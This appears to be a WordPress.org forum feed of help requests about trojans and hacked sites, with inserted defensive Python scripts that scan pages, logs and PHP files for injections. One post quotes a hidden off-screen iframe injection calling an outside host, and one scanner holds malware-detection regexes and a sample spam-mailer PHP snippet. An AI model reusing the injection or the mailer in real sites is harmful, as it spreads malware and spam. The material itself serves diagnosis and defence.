Channel: Topic Tag: trojan | WordPress.org
Viewing all 141 articles

fredriley on "PHP.Trojan.WebShell-7 trojan hack"


Yes, another message about a site being hacked. Before anyone copies and pastes the standard hacking articles, I have already attended to them, read the fine Wordpress Hack FAQ, installed security plugins, sacrificed chickens to the Dark One, and the rest of it.

My query here is simple: it looks like a hack of one of my sites, which redirects mobile users to a porn site, might involve the trojan "PHP.Trojan.WebShell-7", at least according to the Wordfence scan. Has anyone else suffered this hack and/or can point me towards specific information on it? In particular, how the trojan works, and what files it creates and compromises.

I am aware that I may need to rebuild the site but that would take some days which I don't have, so if I can identify compromised files then I can try to eradicate them, and if that fails I can check my latest full site backup (thanks, BackWPUp :)) for malware then restore the site from that. I don't want to have to kill then reanimate the patient for a simple infection.

I have scanned the 5 threads generated by a forum search for "PHP.Trojan.WebShell-7" and they look to have some useful advice, but as far as I can see no information specific to this Trojan. They are quite long so I've not read every single word, though I will do. Neither is Googling it much help. Pointers to information (not general articles, ta very much) would be appreciated, and I'll happily share them with friends and colleagues running WP sites. I've already advised them to install Wordfence as a precaution, which to my shame I should have done myself - I did try Bulletproof on localhost but that messes around mightily with .htaccess files which made me very nervous indeed, so I gave it a miss.

Fred
http://www.fredriley.org.uk


dreamee on "Security Alert on Touchfolio theme"


This message display when I try to install the Touchfolio theme by uploading the zip file. The file is downloaded from http://dimsemenov.com/themes/touchfolio/

Security Alert
The file you are uploading was rejected by the server.
It probably contents viruses or trojans that can damage your website
Do not attempt to upload it again as your IP address may be blocked.

Anyone? Please help.

Fawk on "[Plugin: Shareaholic | share buttons, related posts, social analytics & more] how the QUACK do i remove viglink"

waxxx on "Infected website ! Help guys !"


Hi guys,

When I access my admin section after logging in, I get each time a warning from Avast telling me that a file called quicktags.min.js?ver=3.8.4|{gzip} is infected by JS:Iframe-EJR [Trj].

Besides, I'm receiving a large number of attempts by people trying to access my admin section. The iThemes Security Plugin reports more than 20 to 30 tries per day.

I'm now using 2 plugins for the login form: Two factor auth and Si CAPTCHA Option.

Is there any way to replace that file?

PS: sorry for my English.

SnorkleZ on "Could this Iframe be part of a plugin trojan?"


After using a few new plugins my wp-config.php had ha added at the very beginning and the entire file had been written in Windows format (I had to remove all of the CR's so that BBEdit would display it correctly since I use OSX).

This is on my local server running under MAMP under my own username.

I don't really know PHP or JS well, but looked at the plugins and this caught my eye since it loads arbitrary code from an external site, and I find it odd that the file is named sidebar.php. Is there any way the loaded sidebar.php file could be made to execute arbitrary code?

<div id="postbox-container-1" class="postbox-container">
                <iframe frameBorder="0" height = "1000" src = "http://sudarmuthu.com/projects/wordpress/bulk-move/sidebar.php?color=<?php echo get_user_option( 'admin_color' ); ?>&version=<?php echo self::VERSION; ?>"></iframe>
            </div>

Any comments are greatly appreciated

dromy on "[Plugin: AntiVirus] I'm a little scared for my website..."


Since my plugin update I see on my statistics users from Russia, can't say for sure this is related but it surely raise a question.

Is there an information anywhere on the sites that uses this plug in? or is that the creator of the plugin checking my website?

also, can the plugin writer log to my server or website using this plugin?

https://wordpress.org/plugins/antivirus/

abehjat on "Caught Hacking File that modifies and damages WP via backdoor"


I recently got hacked. However, due to permission settings, somehow the hacker wasn't able to delete all his code files that injected the virus, so I had the chance to read his code. I was not sure where to place this document, however, here is the full meat of the hack. I would encourage people to identify it in their WordPress instance (most likely caused by a vulnerable plugin):

http://pastebin.com/KDzhivWT

rvbinder on "[Plugin: Wordfence Security] CryptoPHP Vulnerability?"


tommyleyland on "script and iframe virus injected above head tag"


Hey guys,
Suddenly all of my websites on the same hosting package are not letting me log in to wp-admin, and I've now taken a look at one of them and none of the CSS is working. I inspected it with Chrome and it seems I've been hacked, but how is it happening on every one?

This has shown above the <head>:

<style>.i0zeuh { position:absolute; left:-1233px; top:-1187px} </style> <div class="i0zeuh"><iframe src="http://azifxum.servepics.com/blog/4c2H?utm_source=g153" width="179" height="248"></iframe></div><!DOCTYPE html>
<!DOCTYPE html>

on http://freelance.tstwebdesign.co.uk/

Does anyone know how I can remove/fix these websites? I'm desperate!
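The injection shown in this post has three tell-tale parts: markup that appears before the real `<!DOCTYPE>`, a CSS class that pushes an element thousands of pixels off-screen, and an `<iframe>` nested inside an element using that class. The scanner below, an added example that is not part of the forum thread, checks a fetched page for exactly those three signs using only the Python standard library. The sample page is constructed to mirror the post (class name and pixel offsets kept, the iframe target replaced by the placeholder `injected.example`) so the script runs offline; the `offscreen_classes` and `scan_html` function names are the example's own.

```python
"""Detect off-screen iframe injections of the kind shown above.
Added example; not code from the forum post. Sample page is constructed."""
import re
from html.parser import HTMLParser

# Constructed sample modelled on the post: injected block, then the real doctype.
SAMPLE_PAGE = (
    '<style>.i0zeuh { position:absolute; left:-1233px; top:-1187px} </style> '
    '<div class="i0zeuh"><iframe src="http://injected.example/blog/4c2H?utm_source=g153" '
    'width="179" height="248"></iframe></div><!DOCTYPE html>\n'
    '<!DOCTYPE html>\n<html><head><title>ok</title></head><body>'
    '<p>legit</p><iframe src="https://www.youtube.com/embed/x"></iframe></body></html>'
)

CSS_RULE = re.compile(r'\.([\w-]+)\s*\{([^}]*)\}')          # .name { body }
OFFSCREEN = re.compile(r'(?:left|top)\s*:\s*-\d+px')        # negative pixel offset
VOID = {'br', 'img', 'meta', 'link', 'input', 'hr', 'area', 'base',
        'col', 'embed', 'source', 'track', 'wbr', 'param'}


def offscreen_classes(css_text):
    """Class names whose rule positions the element at a negative offset."""
    return {name for name, body in CSS_RULE.findall(css_text) if OFFSCREEN.search(body)}


class IframeCollector(HTMLParser):
    """Collect inline CSS and, for each iframe, the classes of its ancestors."""

    def __init__(self):
        super().__init__()
        self.css = []
        self._in_style = False
        self.stack = []      # (tag, class attribute) for each open element
        self.iframes = []    # (src, [ancestor class strings])

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'style':
            self._in_style = True
        elif tag == 'iframe':
            self.iframes.append((a.get('src', ''), [cls for _, cls in self.stack]))
        elif tag not in VOID:
            self.stack.append((tag, a.get('class', '')))

    def handle_endtag(self, tag):
        if tag == 'style':
            self._in_style = False
        elif any(t == tag for t, _ in self.stack):
            while self.stack.pop()[0] != tag:   # tolerate unclosed children
                pass

    def handle_data(self, data):
        if self._in_style:
            self.css.append(data)


def scan_html(html):
    """Return junk found before <!DOCTYPE> plus hidden and visible iframe sources."""
    findings = {'before_doctype': '', 'hidden_iframes': [], 'visible_iframes': []}
    idx = html.lower().find('<!doctype')
    if idx > 0 and html[:idx].strip():
        findings['before_doctype'] = html[:idx].strip()
    p = IframeCollector()
    p.feed(html)
    hidden = offscreen_classes(''.join(p.css))
    for src, ancestors in p.iframes:
        anc_classes = {c for cls in ancestors for c in cls.split()}
        bucket = 'hidden_iframes' if anc_classes & hidden else 'visible_iframes'
        findings[bucket].append(src)
    return findings


if __name__ == '__main__':
    for key, value in scan_html(SAMPLE_PAGE).items():
        print(f'{key}: {value}')
```

Run it against the HTML returned by the live site (for example `requests.get(url).text`) rather than the files on disk: the post's symptom is what the browser receives, and an injection done through a PHP include or a database-stored option will only show up in the served output.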

heidi22 on "[Plugin: UpdraftPlus Backup and Restoration] Trojans downloading with backups"

Maikuolan on "Upload Plugin"


Hi,

I'm the author of a security wrapper that deals with malicious file uploads that's currently deployed to a number of different websites using a number of different CMS and I'm considering writing a Wordpress plugin version of this security wrapper, due to some Wordpress users wanting to make use of this security wrapper but with there being some concerns in regards to compatibility.

The last time that I'd actually used Wordpress would've been at least four years or so ago, it was only very briefly, and I didn't deal with any file upload features of Wordpress whatsoever; I'm not particularly knowledgeable about any of the current versions of Wordpress or their inner workings.

Creating a new topic here requires that I specify which version of Wordpress I use. I selected "4.2.3", because that's the latest version available in that list, but in actuality, I don't use Wordpress for myself at all at this time. Ideally, however, this plugin I'm wanting to write should be compatible with whatever contemporary versions of Wordpress are in current and primary use, because it is intended for wider public availability as opposed to being simply for myself.

I've briefly read what documentation I could find here on the Wordpress website in regards to developing plugins.

It's possible I may have more questions in the future, but for now, I'm hoping that someone here may be able to answer three questions in particular that I have at this time.

Firstly, it has been suggested to me that Wordpress leverages AJAX for its file upload process; Is that true?

Secondly, if the above is true, what would be the appropriate action/hook to use in order to trigger the primary function of the plugin upon a user attempting to upload a file via Wordpress?

Thirdly, and assuming again the above to be true, what response would be expected from the request and how would Wordpress handle that response?

Any help you could provide would be appreciated.

Kind regards,
Caleb M / Maikuolan.

Pixel_me on "[Theme: Virtue] Trojan on theme plugin?"


Hi

A friend of mine (I made his website) contacted me and told me his anti-virus program, G Data, found a virus on his website (I translated the Dutch parts):

Virus: JS:Trojan.JS.Agent.KU (Engine A)
Virus gevonden bij het inladen van internet-content. (Virus found while loading content)
Adres: http://www.wildvangpiercing.be/wp-content/themes/virtue/assets/js/min/plugins-min.js?ver=249
Status: De toegang is geweigerd. (access denied)

Avast anti-virus does not give me a warning on my pc. But when I scan in Wordpress with the plugin Anti-Malware and Brute-Force Security by ELI, it finds potential threats on:

.../wp-content/themes/virtue/assets/js/plugins.js
.../wp-content/themes/virtue/assets/js/min/plugins-min.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-css.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-javascript.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-php.js

I updated the theme and did a new scan but same results.

So is this a real trojan? Or just a misinterpretation of the scanner? Or perhaps just a virus on my friends pc?

Regards

DidoH on "Remove StealRat from website"


Hi there,

I have discovered that my site julialloydgeorge.com has StealRat. The server has removed the site to prevent it damaging the sites of other customers. Is anyone able to help me remove this malware and suggest ways of securing my website for the future? I am pretty sure there was malicious code in the header.php.

Many thanks,
Domini

syzygist on "[Plugin: WP Backitup] blocked trojan alert followed by page not found errors when downloading"


I was already lukewarm about this plugin because it required me to download 6 separate backup files every time I back up, which is a hassle. Then tonight, I was able to download the first three, but as I was downloading the 4th file (themes), I received an alert from my antivirus program (Avast) that a trojan had been blocked. Then I got a "this page doesn't exist" error when I tried again to download the themes backup file, and the other two remaining backup files.

I wasn't sure if this was related to the alert or not, but to be safe, I deleted the first three files, and started the process all over again. The backup process seemed to complete normally, but this time I wasn't able to download any of the files.

I tried it one more time in a different browser (started with FireFox, then I tried IE), with the same result. Thought I'd try support, but it's only available for premium users. That's WAY too much hassle and possible risk. Was the trojan related to the plugin? Don't know, but I can't rule it out. Uninstalled it, and do not recommend!

https://wordpress.org/plugins/wp-backitup/

markwadetaylor on "Trojan in gadgetine theme"


markwadetaylor on "Gadgetine theme has a trojan according to AVG"

gaynor1011 on "[Plugin: Website Toolbox Forums] Widgets, Trojan, can't upgrade"


Hi all,
Please could someone help me? I have a number of issues. I tried to go onto my website but Bitdefender said it had a trojan, so I'm trying to find out why. When I finally went onto it I found I could not upgrade to the new version of Wordpress - it tells me Could not copy file.: wp-includes/images/crystal/document.png

All my plugins and everything else are sorted.

Then I found that for some reason I can't access Widgets - it no longer appears under 'Appearance' on my dashboard. I activated a new theme to try to solve the above problem and all my widgets disappeared.

So in a nutshell, what is the trojan thing, how do I get rid of it, how do I upgrade to the new version of Wordpress and where are my widgets? My site is at http://www.popspeaking.com

Regards, Gaynor

https://wordpress.org/plugins/website-toolbox-forums/

icetek on "Crackers are using xmlrpc.php and putting a backdoor into my PHP code..."

access.log.1:151.80.103.33 - - [28/Sep/2015:23:03:10 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:196.36.167.46 - - [28/Sep/2015:23:07:13 -0700] "POST /xmlrpc.php HTTP/1.1" 404 504 "-" "-"
access.log.1:181.174.182.153 - - [28/Sep/2015:23:07:52 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:08:16 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:42.116.25.90 - - [28/Sep/2015:23:09:01 -0700] "POST /xmlrpc.php HTTP/1.1" 200 836 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:13:04 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:180.250.89.210 - - [28/Sep/2015:23:13:46 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:18:22 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:23:25 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:28:19 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:59.178.173.233 - - [28/Sep/2015:23:30:29 -0700] "POST /xmlrpc.php HTTP/1.1" 404 474 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:33:15 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:38:48 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:43:56 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:48:43 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:53:38 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:31.11.95.223 - - [28/Sep/2015:23:54:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:58:28 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.31 - - [29/Sep/2015:00:00:35 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.31 - - [29/Sep/2015:00:02:25 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [29/Sep/2015:00:03:15 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
^C

This is info on the trojan they're installing. I'm trying to use stream editor or possibly awk to remove it.. I think XMLRPC is how they're getting in..
http://stackoverflow.com/questions/33072420/how-do-i-use-find-sed-i-to-remove-the-line-containing-ua-strtolower-from-p
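The access-log excerpt above is the evidence worth keeping: one client hammering `POST /xmlrpc.php` every five minutes while a handful of others get a `200`. The script below, an added example rather than anything from the post, parses Apache combined-format lines (tolerating the `access.log.1:` prefix that grep adds), keeps only POSTs to `xmlrpc.php`, and reports per-client totals, the status-code split, and the peak number of requests inside a sliding one-hour window so that a slow, evenly spaced scan like the one shown is still flagged. The log lines are constructed with RFC 5737 test addresses; the function names and the default threshold of 10 requests per hour are the example's own choices.

```python
"""Per-client summary of POST /xmlrpc.php traffic from an Apache access log.
Added example; not from the forum post. Sample log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format; an optional "filename.log[.N]:" grep prefix is accepted.
LOG_RE = re.compile(
    r'^(?:\S+?\.log(?:\.\d+)?:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def xmlrpc_summary(lines, window=timedelta(hours=1), threshold=10):
    """Count POSTs to xmlrpc.php per client IP; flag any IP whose request
    count inside some window of length `window` reaches `threshold`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'].split('?')[0].endswith('/xmlrpc.php'):
            by_ip[rec['ip']].append(rec)

    report = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        statuses = defaultdict(int)
        for r in recs:
            statuses[r['status']] += 1
        peak, start = 0, 0                       # sliding window over sorted timestamps
        for end in range(len(recs)):
            while recs[end]['ts'] - recs[start]['ts'] > window:
                start += 1
            peak = max(peak, end - start + 1)
        report[ip] = {'total': len(recs), 'by_status': dict(statuses),
                      'peak_in_window': peak, 'flagged': peak >= threshold}
    return report


def _line(ip, ts, status, ua='-'):
    """Build one constructed log line in the same shape as the post's excerpt."""
    return f'access.log.1:{ip} - - [{ts}] "POST /xmlrpc.php HTTP/1.1" {status} 466 "-" "{ua}"'


# Constructed sample: one client every 5 minutes for an hour, plus a few one-offs.
SAMPLE_LOG = [
    _line('203.0.113.7', f'28/Sep/2015:23:{m:02d}:10 -0700', 404, 'Mozilla/5.0')
    for m in range(0, 60, 5)
] + [
    _line('198.51.100.20', '28/Sep/2015:23:07:52 -0700', 200),
    _line('198.51.100.21', '28/Sep/2015:23:30:29 -0700', 404),
    'access.log.1:198.51.100.22 - - [28/Sep/2015:23:31:00 -0700] '
    '"GET /index.php HTTP/1.1" 200 1234 "-" "-"',
]

if __name__ == '__main__':
    for ip, info in sorted(xmlrpc_summary(SAMPLE_LOG).items()):
        print(ip, info)
```

Feed it real lines with `xmlrpc_summary(open('access.log'))`. The status split matters when reading the result: a `404` on `xmlrpc.php` means the file is blocked or missing on that vhost and the request did no work, while a run of `200`s from one source is where to look for successful `system.multicall` or `pingback` abuse, which is the behaviour the original post suspects.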

mike11d11 on "Email worm sending through wordpress site"


I'm pretty new to WordPress and was looking for some assistance on how our WordPress site is getting taken advantage of by some sort of email worm or virus. We currently use Exchange for email in our environment and a 3rd party outbound filtering service, so we are fortunate that this virus or worm is not getting us blacklisted. We noticed that our webserver is relaying bogus emails throughout the day; it really isn't a ton of messages, seems like only 10 a minute or so, but they are bogus accounts not on our system. We eventually narrowed it down to the WordPress site, and as soon as we stop the site all the emails stop. I even went in and changed the email settings within the WordPress site, but that doesn't have any effect on the mail going out because we allow relaying from only specific IPs and this is one. How can I troubleshoot the site itself to see which part has been compromised by this worm in order to get rid of it? Any assistance is appreciated!
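Because stopping the site stops the mail, the sending code lives somewhere in the site's PHP tree, and changing WordPress's mail settings cannot affect a script that calls `mail()` directly. The triage helper below, an added example and not part of the thread, walks a directory (intended for `wp-content`, where no legitimate file should call `mail()`), reports every PHP file that can send mail or run decoded code, ranks a file that does both as the first thing to read, and records the modification time so the newest hits can be compared against when the relaying started. The pattern names, the scoring rules and the constructed sample mailer are the example's own.

```python
"""Find PHP files that can send mail or execute obfuscated code.
Added example; not from the forum post. Patterns and sample are constructed."""
import os
import re

SUSPICIOUS = {
    'mail_call': re.compile(r'\bmail\s*\('),
    'eval': re.compile(r'\beval\s*\('),
    'decode_then_exec': re.compile(r'\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\('),
    # request data on the same line as a function that executes or sends it
    'request_to_exec': re.compile(r'\$_(?:POST|GET|REQUEST|COOKIE)\b.*\b(?:eval|assert|system|mail)\s*\('),
    'long_base64': re.compile(r'[A-Za-z0-9+/]{200,}={0,2}'),
}


def scan_php_source(src):
    """Return [(pattern_name, line_no)] for every suspicious hit in a PHP string."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((name, no))
    return hits


def score(hits):
    """Rank a file: mail plus decoding/eval in one file is the spam-relay shape."""
    names = {n for n, _ in hits}
    if 'mail_call' in names and names & {'eval', 'decode_then_exec', 'request_to_exec'}:
        return 'high'
    if names & {'eval', 'request_to_exec', 'long_base64'}:
        return 'medium'
    return 'low' if hits else 'none'


def scan_tree(root):
    """Scan every PHP-like file under root; return {path: {score, hits, mtime}}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(('.php', '.phtml', '.inc')):
                path = os.path.join(dirpath, fn)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    results[path] = {'score': score(hits), 'hits': hits,
                                     'mtime': os.path.getmtime(path)}
    return results


# Constructed sample: the shape of a mailer dropped into an uploads directory.
SAMPLE_MAILER = """<?php
$to = $_POST['t'];
$body = base64_decode($_POST['b']);
mail($to, "hello", $body);
"""

if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else '.'
    ranked = sorted(scan_tree(root).items(),
                    key=lambda kv: (kv[1]['score'] != 'high', -kv[1]['mtime']))
    for path, info in ranked:
        print(info['score'], path, info['hits'])
```

A `high` hit under `wp-content/uploads` is almost always the answer; `mail_call` alone inside a contact-form plugin is expected and rates `low`. Once the file is found, the web server's access log filtered for that path shows who has been invoking it and since when.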

iamankitshah on "[Plugin: Comment Mail™ (WP Comment Subscriptions)] Virus Total Scan"
